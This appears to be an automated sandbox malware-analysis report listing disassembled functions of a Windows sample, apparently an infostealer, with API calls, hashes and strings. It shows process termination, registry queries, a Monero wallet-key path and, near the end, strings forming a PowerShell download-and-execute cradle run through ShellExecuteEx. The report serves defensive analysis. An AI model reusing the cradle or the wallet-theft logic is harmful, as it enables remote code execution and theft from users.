                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                  • String ID: D
                                  • API String ID: 531068710-2746444292
                                  • Opcode ID: ab550a190cf489297d48f3b96e2a37f65417ece2a2092a42f439474c71fbb89c
                                  • Instruction ID: 4785035b0953acb99d06b3c2975321a92eca4726f7b54daf8a612b6d777d07b5
                                  • Opcode Fuzzy Hash: ab550a190cf489297d48f3b96e2a37f65417ece2a2092a42f439474c71fbb89c
                                  • Instruction Fuzzy Hash: B15188B5D44308ABDB24DB60DC4AFEA77B8AB44700F0045D8B60DAB2D1EB755B88CF51
                                  Function 00C1F9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                  Download Yara Rule
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 00C1FA1F
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00C1FA27
                                  • _ValidateLocalCookies.LIBCMT ref: 00C1FAB0
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00C1FADB
                                  • _ValidateLocalCookies.LIBCMT ref: 00C1FB30
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction ID: 109d7ff537de0255e1b7240c1b3e804fe10c303fb5e1eee085b494598ac04355
                                  • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction Fuzzy Hash: 6B41A930900119DFCF10DF68C884ADD7BB5FF46314F14816AE829AB352D735DA86EB91
                                  Function 00BA5000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BA501A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA5021
                                  • InternetOpenA.WININET(00BC0DE3,00000000,00000000,00000000,00000000), ref: 00BA503A
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00BA5061
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00BA5091
                                  • InternetCloseHandle.WININET(?), ref: 00BA5109
                                  • InternetCloseHandle.WININET(?), ref: 00BA5116
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: bb4d61efcadd214afc22ca79de519819ca1ef6cd579ffcaca8cb5b4a47db5bd3
                                  • Instruction ID: a65a082fb3fc7695deaa145e4e07a7bb86382005fbbfc352d47a1f00c665084b
                                  • Opcode Fuzzy Hash: bb4d61efcadd214afc22ca79de519819ca1ef6cd579ffcaca8cb5b4a47db5bd3
                                  • Instruction Fuzzy Hash: BC31F6B4A44218ABDB20CF54DC85BDDB7B4AB48304F5081E8FA09B7281D7706EC58F98
                                  Function 00BB856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BB85B6
                                  • wsprintfA.USER32 ref: 00BB85E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BB860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB8629
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                  • RegQueryValueExA.ADVAPI32(00000000,0130E630,00000000,000F003F,?,00000400), ref: 00BB867C
                                  • lstrlen.KERNEL32(?), ref: 00BB8691
                                  • RegQueryValueExA.ADVAPI32(00000000,0130E5B8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00BC0B3C), ref: 00BB8729
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB8798
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB87AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: e2fc5b5638b53dc757c9dd0231f916b8343f3fbc3e42f0377a0876e40dfacfcd
                                  • Instruction ID: 8607db4aee36fe92f497a1646111cfa39b79380f45004cda8f00de5e01003fcd
                                  • Opcode Fuzzy Hash: e2fc5b5638b53dc757c9dd0231f916b8343f3fbc3e42f0377a0876e40dfacfcd
                                  • Instruction Fuzzy Hash: 46210771A10218AFDB24DB54DC85FE9B7B8FB48704F0081D8A649A6180DF706A85CFA4
                                  Function 00BB99A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BB99C5
                                  • Process32First.KERNEL32(00BAA056,00000128), ref: 00BB99D9
                                  • Process32Next.KERNEL32(00BAA056,00000128), ref: 00BB99F2
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BB9A4E
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BB9A6C
                                  • CloseHandle.KERNEL32(00000000), ref: 00BB9A79
                                  • CloseHandle.KERNEL32(00BAA056), ref: 00BB9A88
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: f331e9113f62d4acda803170f9901e61453fe72d86323506e25b0f40e25b9e3a
                                  • Instruction ID: 65070f82528503cdf62188c3fa8d4e3aa93fe864a6934e83d28e7b7f75624188
                                  • Opcode Fuzzy Hash: f331e9113f62d4acda803170f9901e61453fe72d86323506e25b0f40e25b9e3a
                                  • Instruction Fuzzy Hash: 7021CD759042189FDB25DF52DC89BEDB7B9BB48704F5041C8E609A6290D7749EC4CF50
                                  Function 00BB7820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7834
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB783B
                                  • RegOpenKeyExA.ADVAPI32(80000002,012FC808,00000000,00020119,00000000), ref: 00BB786D
                                  • RegQueryValueExA.ADVAPI32(00000000,0130E480,00000000,00000000,?,000000FF), ref: 00BB788E
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB7898
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 082cd4ac12500dff55cac737d84bf3b972f386cacfeba102f1179edfe8de3af1
                                  • Instruction ID: 376204cc1f2717201b720b11aa8b7966b13c4b015029c7701f46959b14afc4a4
                                  • Opcode Fuzzy Hash: 082cd4ac12500dff55cac737d84bf3b972f386cacfeba102f1179edfe8de3af1
                                  • Instruction Fuzzy Hash: 0901F4B5A48305BFE700DBE6DD49FAD77B8EB44700F104198FA59A7291DAB09944CB50
                                  Function 00BB78B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB78C4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB78CB
                                  • RegOpenKeyExA.ADVAPI32(80000002,012FC808,00000000,00020119,00BB7849), ref: 00BB78EB
                                  • RegQueryValueExA.ADVAPI32(00BB7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00BB790A
                                  • RegCloseKey.ADVAPI32(00BB7849), ref: 00BB7914
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: 27a24157e9b1a49777ea7141d87b10c86e67b36933abb849215a53abf2af7589
                                  • Instruction ID: 889f707eb94ed42b9315f7617b2233cc419a1eb8b7f66f834454bda12a644422
                                  • Opcode Fuzzy Hash: 27a24157e9b1a49777ea7141d87b10c86e67b36933abb849215a53abf2af7589
                                  • Instruction Fuzzy Hash: FE0167B5A44309BFEB00DBE5DC4AFAE77B8EB44700F004598F659B7291D7705A44CB90
                                  Function 00BAA110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BAA13C
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BAA161
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00BAA181
                                  • ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BAA1AA
                                  • LocalFree.KERNEL32(00BA148F), ref: 00BAA1E0
                                  • CloseHandle.KERNEL32(000000FF), ref: 00BAA1EA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 885db3e8385fbe3312d46d9b4186d931538fa08cfa63c6d91e4df8ac03828628
                                  • Instruction ID: 9d86449c0e0969220ed1d9c40fd96c3f586e6e594914a30fda028b4a46f6cce2
                                  • Opcode Fuzzy Hash: 885db3e8385fbe3312d46d9b4186d931538fa08cfa63c6d91e4df8ac03828628
                                  • Instruction Fuzzy Hash: 1731FC74A04209EFDB14CF95D885BEEB7B5EB49300F108198E915B7290D774AA85CFA1
                                  Function 00BB49D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcat.KERNEL32(?,0130E840), ref: 00BB4A2B
                                    • Part of subcall function 00BB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB4A51
                                  • lstrcat.KERNEL32(?,?), ref: 00BB4A70
                                  • lstrcat.KERNEL32(?,?), ref: 00BB4A84
                                  • lstrcat.KERNEL32(?,012FBA20), ref: 00BB4A97
                                  • lstrcat.KERNEL32(?,?), ref: 00BB4AAB
                                  • lstrcat.KERNEL32(?,0130E278), ref: 00BB4ABF
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BB8F20: GetFileAttributesA.KERNEL32(00000000,?,00BA1B94,?,?,00BC577C,?,?,00BC0E22), ref: 00BB8F2F
                                    • Part of subcall function 00BB47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BB47D0
                                    • Part of subcall function 00BB47C0: RtlAllocateHeap.NTDLL(00000000), ref: 00BB47D7
                                    • Part of subcall function 00BB47C0: wsprintfA.USER32 ref: 00BB47F6
                                    • Part of subcall function 00BB47C0: FindFirstFileA.KERNEL32(?,?), ref: 00BB480D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: bb15b2b1947d53185702474698d414e38fc387ee44796a4d2d3b669adbf7d2f0
                                  • Instruction ID: 831debb983a3532a184b7ebe7a2331927b0ea80b47d3b479e0e9c5d8892fb7a9
                                  • Opcode Fuzzy Hash: bb15b2b1947d53185702474698d414e38fc387ee44796a4d2d3b669adbf7d2f0
                                  • Instruction Fuzzy Hash: 2C3152F69002086BCF24EBB0DC85EED777CAB58700F4049D9B359A6052DEB096CDCB94
                                  Function 00BB2EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB2FD5
                                  Strings
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00BB2F14
                                  • <, xrefs: 00BB2F89
                                  • ')", xrefs: 00BB2F03
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00BB2F54
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
